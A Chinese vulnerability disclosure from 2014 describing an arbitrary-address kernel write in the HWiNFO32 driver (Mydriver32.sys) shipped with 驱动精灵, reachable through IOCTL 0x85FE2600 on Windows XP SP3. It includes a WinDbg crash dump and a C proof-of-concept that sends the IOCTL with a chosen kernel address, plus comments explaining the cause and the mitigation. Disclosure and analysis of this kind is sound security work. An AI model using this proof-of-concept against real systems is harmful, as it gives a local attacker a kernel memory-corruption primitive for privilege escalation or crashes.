2014-09-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-28: 厂商已经主动忽略漏洞,细节向公众公开
HWiNFO32驱动过滤不严,造成任意地址写固定数据漏洞。驱动精灵中包含HWiNFO32,其名称为Mydriver32.sys
在DeviceIoControl例程中,当IoControlCode=0x85FE2600时,驱动不严格过滤用户传入的lpOutBuffer参数,直接调用nt!IopfCompleteRequest;经过一系列处理后,最终在nt!IopCompleteRequest产生漏洞,可写任意地址。因其最终引发在nt!IopCompleteRequest,所以也与操作系统相关:经测试xpsp3可正常利用,win7则没有影响。
windbg崩溃信息。
PAGE_FAULT_IN_NONPAGED_AREA (50)Invalid system memory was referenced. This cannot be protected by try-except,it must be protected by a Probe. Typically the address is just plain bad or itis pointing at freed memory.Arguments:Arg1: ffff0000, memory referenced.Arg2: 00000001, value 0 = read operation, 1 = write operation.Arg3: 804ed09b, If non-zero, the instruction address which referenced the bad memory address.Arg4: 00000000, (reserved)Debugging Details:------------------WRITE_ADDRESS: ffff0000 FAULTING_IP: nt!IopCompleteRequest+92804ed09b f3a5 rep movs dword ptr es:[edi],dword ptr [esi]MM_INTERNAL_CODE: 0DEFAULT_BUCKET_ID: CODE_CORRUPTIONBUGCHECK_STR: 0x50PROCESS_NAME: TestMyDriver32_IRP_ADDRESS: 82177f68DEVICE_OBJECT: 81d5f518DRIVER_OBJECT: 81d26288IMAGE_NAME: DgSafe.sysDEBUG_FLR_IMAGE_TIMESTAMP: 540684f3MODULE_NAME: DgSafeFAULTING_MODULE: b1250000 mydrivers32TRAP_FRAME: b137f91c -- (.trap 0xffffffffb137f91c)ErrCode = 00000002eax=00000110 ebx=82177f68 ecx=00000044 edx=00000001 esi=81f24680 edi=ffff0000eip=804ed09b esp=b137f990 ebp=b137f9d4 iopl=0 nv up ei pl nz na pe nccs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206nt!IopCompleteRequest+0x92:804ed09b f3a5 rep movs dword ptr es:[edi],dword ptr [esi]Resetting default scopeLAST_CONTROL_TRANSFER: from 80533797 to 804e450aSTACK_TEXT: b137f46c 80533797 00000003 ffff0000 00000000 nt!RtlpBreakWithStatusInstructionb137f4b8 8053426e 00000003 806f2298 c03fffc0 nt!KiBugCheckDebugBreak+0x19b137f898 8053485e 00000050 ffff0000 00000001 nt!KeBugCheck2+0x574b137f8b8 805251a8 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1bb137f904 804e2747 00000001 ffff0000 00000000 nt!MmAccessFault+0x6f5b137f904 804ed09b 00000001 ffff0000 00000000 nt!KiTrap0E+0xccb137f9d4 804ed11a 82177fa8 b137fa20 b137fa14 nt!IopCompleteRequest+0x92b137fa24 806f2c35 00000000 00000000 b137fa3c nt!KiDeliverApc+0xb3b137fa24 806f2861 00000000 00000000 b137fa3c hal!HalpApcInterrupt+0xc5b137faac 804e63cc 82177fa8 82177f68 00000000 
hal!KeReleaseInStackQueuedSpinLock+0x11b137facc 804ed134 82177fa8 81d2d588 00000000 nt!KeInsertQueueApc+0x4bb137fb00 b1251f27 81d2d588 81d26288 82177f68 nt!IopfCompleteRequest+0x1d8WARNING: Stack unwind information not available. Following frames may be wrong.b137fc34 804e4767 81d5f518 82177f68 806f22d0 mydrivers32+0x1f27b137fc44 805692ab 82177fd8 81d2d588 82177f68 nt!IopfCallDriver+0x31b137fc58 805781e2 81d5f518 82177f68 81d2d588 nt!IopSynchronousServiceTail+0x70b137fd00 8057a705 00000054 00000000 00000000 nt!IopXxxControlFile+0x611b137fd34 804df7f8 00000054 00000000 00000000 nt!NtDeviceIoControlFile+0x2ab137fd34 7c92e514 00000054 00000000 00000000 nt!KiSystemServicePostCall0013fed8 7c92d28a 7c801675 00000054 00000000 ntdll!KiFastSystemCallRet0013fedc 7c801675 00000054 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc0013ff3c 00401058 00000054 85fe2600 0013ff68 kernel32!DeviceIoControl+0xdd0013ff68 00401083 00000000 0040302c 78542201 TestMyDriver32_b!TestMyDriver32+0x58 [e:\code_src\c\testmydriver32\testmydriver32\testmydriver32.cpp @ 29]0013ff7c 0040120f 00000001 00033d48 000328b8 TestMyDriver32_b!wmain+0x13 [e:\code_src\c\testmydriver32\testmydriver32\testmydriver32.cpp @ 37]0013ffc0 7c816037 0558ee60 7c92d96e 7ffdf000 TestMyDriver32_b!__tmainCRTStartup+0x10f [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 579]0013fff0 00000000 00401357 00000000 78746341 kernel32!BaseProcessStart+0x23STACK_COMMAND: kbCHKIMG_EXTENSION: !chkimg -lo 50 -d !nt 804df7da-804df7df 6 bytes - nt!KiSystemServiceAccessTeb+2c [ 8b fc f6 45 72 02:e9 ce 15 b5 31 90 ] 80586896-80586899 4 bytes - nt!NtTerminateProcess+4b [ ce f4 fd ff:ad 49 a9 31 ] 806319c6-806319c9 4 bytes - nt!NtTerminateJobObject+2d (+0xab130) [ 9e 43 f3 ff:cd 98 9e 31 ]14 errors : !nt (804df7da-806319c9)FOLLOWUP_NAME: MachineOwnerMEMORY_CORRUPTOR: PATCH_DgSafeFAILURE_BUCKET_ID: MEMORY_CORRUPTION_PATCH_DgSafeBUCKET_ID: MEMORY_CORRUPTION_PATCH_DgSafeFollowup: MachineOwner---------
利用测试代码:
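/*
 * Test harness from the report: opens the HWiNFO32 device and sends
 * IOCTL 0x85FE2600 with a caller-chosen lpOutBuffer.  The crash dump
 * above shows the unvalidated pointer reaching nt!IopfCompleteRequest
 * and the I/O manager's completion path (nt!IopCompleteRequest) writing
 * through it.  Driver-side mitigation: probe/validate user-supplied
 * pointers (e.g. ProbeForWrite under __try) or use METHOD_BUFFERED so the
 * I/O manager owns the buffers.  Returns nothing; prints a message and
 * returns early if the device cannot be opened.
 */
VOID TestMyDriver32()
{
    HANDLE hCreateFile = INVALID_HANDLE_VALUE;
    DWORD dwInBuffer = 0x6c77792a;
    DWORD dwOutBuffer = 0xf8be8020; /* kernel-writable address; change as needed */

    hCreateFile = CreateFileA("\\\\.\\HWiNFO32",
                              0,                  /* no access to the drive */
                              FILE_SHARE_READ |   /* share mode */
                              FILE_SHARE_WRITE,
                              NULL,               /* default security attributes */
                              OPEN_EXISTING,      /* disposition */
                              0,                  /* file attributes */
                              NULL);
    if (hCreateFile == INVALID_HANDLE_VALUE) {
        printf("Error Open Device!\n");
        return;
    }

    /* dwInBuffer doubles as lpBytesReturned here (as in the original);
     * the output pointer is an integer reinterpreted as a user pointer. */
    DeviceIoControl(hCreateFile,
                    0x85FE2600,
                    (LPVOID)&dwInBuffer,
                    sizeof dwInBuffer,
                    (LPVOID)dwOutBuffer,
                    0,
                    &dwInBuffer,
                    NULL);

    CloseHandle(hCreateFile);
    return;
}

/*
 * Entry point: runs the harness, then blocks on stdin so the console
 * stays open.  The read is bounded to the buffer size (the original
 * used an unbounded "%s", itself a stack overflow on long input).
 */
int _tmain(int argc, _TCHAR* argv[])
{
    char cSSS[10];

    (void)argc;
    (void)argv;

    TestMyDriver32();
    scanf("%9s", cSSS); /* at most 9 chars + NUL fits cSSS[10] */
    return 0;
}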
开发人员更懂
未能联系到厂商或者厂商积极拒绝